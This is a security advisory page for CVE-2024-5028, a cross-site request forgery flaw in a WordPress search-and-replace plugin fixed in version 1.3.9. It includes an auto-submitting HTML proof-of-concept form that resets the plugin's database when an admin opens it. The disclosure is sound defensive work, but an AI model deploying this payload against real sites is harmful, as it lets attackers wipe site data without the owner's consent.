CM WordPress Search And Replace Plugin < 1.3.9 – Plugin Reset via CSRF | CVE 2024-5028 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks

Proof of Concept

Make a logged in admin open an HTML file containing:

```
<html>
  <body>
    <form action="http://example.com/wp-admin/admin.php?page=cmodsar_settings" method="POST">
      <input type="hidden" name="cmodsar&#95;pluginCleanup" value="Cleanup&#32;database" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

Affects Plugins

cm-on-demand-search-and-replace

Fixed in 1.3.9

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Felipe Caon

Submitter

caon

Submitter website

https://caon.io

Verified

Yes

WPVDB ID

0bae8494-7b01-4203-a4f7-ccc60efbdda7

Timeline

Publicly Published

2024-06-22 (about 1 year ago)

Added

2024-06-22 (about 1 year ago)

Last Updated

2024-06-22 (about 1 year ago)

Other

Published

Title

Published

2025-04-09

Title

WP-Planification <= 2.3.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-03-12

Title

WP Multistore Locator <= 2.5.2 - Cross-Site Request Forgery

Published

2021-02-10

Title

Responsive Menu < 4.0.4 - CSRF to Arbitrary File Upload

Published

2024-04-11

Title

ELEX WooCommerce Dynamic Pricing and Discounts < 2.1.3 - Cross-Site Request Forgery

Published

2021-07-05

Title

Travel Light <= 1.0 - CSRF Bypass